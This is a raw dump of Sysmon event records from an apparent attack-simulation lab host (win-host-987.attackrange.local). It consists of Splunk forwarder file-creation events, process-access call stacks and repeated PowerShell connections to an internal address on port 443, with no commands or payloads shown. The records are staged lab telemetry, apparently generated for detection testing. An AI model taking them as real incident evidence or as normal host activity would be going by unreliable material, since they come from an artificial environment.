Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3003C97D9E96BBF00DE3DE82E2C2DEC,SHA256=FA5DFC7417CA052051ACC8466658570490D6D5793A70AF0E4CC8E558D2F562E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:07.164{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52549-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:41.274{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65711E6F59921AC2C4848A04ABE1E906,SHA256=21585EE1741DC32ECB6996AF15F601C6F3E8574BE708296786DA1563F9533205,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:41.190{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6FF4BF3A40CB09936EFB58E87E962B5B,SHA256=556BC8D0681559E4B6EDA98E8AAC73F24F6D01A9FB5946D9E62CB2186CCE6262,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:42.289{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=564059845356186D9AA7A4D8CCB1D324,SHA256=D2F2B5048B6692629DC845B7CE208A0CCB7CECB671B7A78484727EA039DFC49F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:43.292{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A518C0DA2597DA1349F843AABC4F07F2,SHA256=07EE3AD8B3BF8925452B45A4E6EFE5726369A5472A5F4EEF71FAAADB21A4F650,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:44.907{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=433624885BBEF1895BAADACE08122E03,SHA256=5BCF04DC08D3F2EA59BEF9305B1F99731A51FE109072538C2F29A53A417F8BAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:10.197{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52550-false10.0.1.12-8000- 23542300x800000000000000035343403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:44.307{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9272BF340EF03EEBA94359572248E7EA,SHA256=2C4A4378CC94B254986ADFB1C79BB847AA80A9C90C856D85015725C9DE0907FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:45.359{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E71C8C6B932AE182C7E804EFD9AB7843,SHA256=E403A215A61F429C4B0DB87F83DE69F179779981CA843F20D24323EE7502CAD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:46.404{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=678459E7E6E99AAF650AC069642E7960,SHA256=645731219C3697B31897162A7611B8684B2F74FB1DAD62FBBF8B173E9B8A26BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:13.179{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52551-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:47.419{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C49C9356E970A4758BF23BA2CB4313EB,SHA256=903AA95F9FBACB052AAD57882D0BC818B08C34207F19F7B298FFAE056D87C63F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:47.188{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9ABF050B09D955A047C0EC6776FE037D,SHA256=8BD48760DBD4FF002ED6F2ABFC7C07638117CB2A452BF5FEA0CB9AEA3B21837D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:48.435{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23523F2553691376E9D83B90E989132D,SHA256=D222F18665A417FEEE85393AEC887E9287EE7BC3160055AB68A66E7C329BD4FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:49.454{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A07AC84EF70D4AFC5903B7AB874B3DE,SHA256=C58605E9B9EF2951C049FD7434919FBCCEF2F985F4D107D13A80BC08503E1C99,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:50.468{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=139FF70CCCC3BED28892D05BB876B338,SHA256=7790FB38529EE61B86DD473DB7B9A0595D9D9841B4B5941B9135CB95FAE3CB71,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:51.498{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13C4ED84021B919F4AE48FF7D03D55D7,SHA256=085FA62FBEAF1E1C0B6208FCB7FC39149520827BF62EB65E259331242475CFC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:15.241{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52552-false10.0.1.12-8000- 23542300x800000000000000035343416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:52.515{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47F7C67B9823B753CD3051DBEC8241F1,SHA256=D1C42009BC55C8B9FBF851B13EFE1BCBF544196F789DB9E640EA80D1EE59D279,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:53.535{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C3A34DD501BCBA489E4228438F59756,SHA256=011BADF0F91661087F1919482DFC89B4E68A83A1FB791975878038242EFD31D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:53.401{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=040889EB1DA6CB12FD90C8AA97FB5A70,SHA256=D0353993C0981B8C636E6FF91FD5CC214E91CB8AF2B185F25BB7EA656012AA23,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:19.187{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52553-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:54.569{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF42ED1325CC503E0070754DF04F135C,SHA256=AC785553097537403D5D6B5379C623368F2B3C38C72DC16E0E16C916A22C460A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:55.600{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE1489D1DD072C1CC3CAC5EAF8F6C836,SHA256=CAC82F94FAE98D2784980F99B1498C86AF40626EA035BFC28A52DBD87C4848E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:56.633{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55D8F549A1F02FED189423345B90FD29,SHA256=D80A3B5217AC420D7E4886E6F52D9B779E35F2708AAB6539BE3D87A5E92701ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:57.652{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F62DA39921E282C2E30F806095C71EE,SHA256=F89B168B364CD4DAE53C35EEAEC8A8BEBEA169641BFEB82C27AC8608BECC1744,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:21.121{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52554-false10.0.1.12-8000- 23542300x800000000000000035343426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:58.667{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=756088CAF9796E657749A5B4FEFE93AE,SHA256=DA1369A05956192AA1D1F1ED8E08B01CFE50780E8CB2B03C57F3215A62ECDAB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:58.183{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4452C4F1F2EDF5A00D42DD1823A46427,SHA256=56F3850A31D18B7DED7F55F9CC7A4CEF09FED1752ADE2DB970C1200722CF23F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:59.682{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F992D16A032539BC205687AA59746B63,SHA256=BA8D63A4C9EF12E2E4CFC5E4835E4454400D24ED2F69E76ADB5494CC76421B18,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:24.188{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52555-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:00.697{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04BF41509E0FA7C2E426F284D24042E4,SHA256=78D9D8CC060C66BF01809598F6E8CF4DB0467D5E352C859D72F0BB982E8301C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:01.735{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACE5EE88206717E8ECBF6809B3DDDF2D,SHA256=BF5A321F937297748651B990B8B718EF53419FD65488BC734B805A0AC36E9C92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:02.766{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7677E835079E13DCB244974BC2009B9,SHA256=5BA02540CF590A4AE0BF25656E3CB7B5E05C728EA6E4DA5D99496DBE514808E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:26.237{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52556-false10.0.1.12-8000- 23542300x800000000000000035343434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:03.767{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C89534420CD4E2876DB0F9D7185FED0,SHA256=360396DCACD62ABBFF10D72451BA1DCE65A3DCE3A02B4A4DFF035DB21C121895,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:03.414{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=658EF4748BAE3C98AC02F96C36FCB450,SHA256=9326CFBDFD8898D3D68CA0617DBC1D62E9AB49598D5FFB9BC10F369BECE8CDE3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.786{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A24473A51B27EF2D9C294E065526D48,SHA256=39EAB4AE3886EBA93B9C5933C3DFA0720F42DD1D16A50EE8C6595683BE30BAD9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.739{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7420-613B-5BB4-03000000C801}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.739{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.739{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.739{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-7420-613B-5BB4-03000000C801}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.739{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.739{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.739{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7420-613B-5BB4-03000000C801}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.734{B81B27B7-7420-613B-5BB4-03000000C801}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 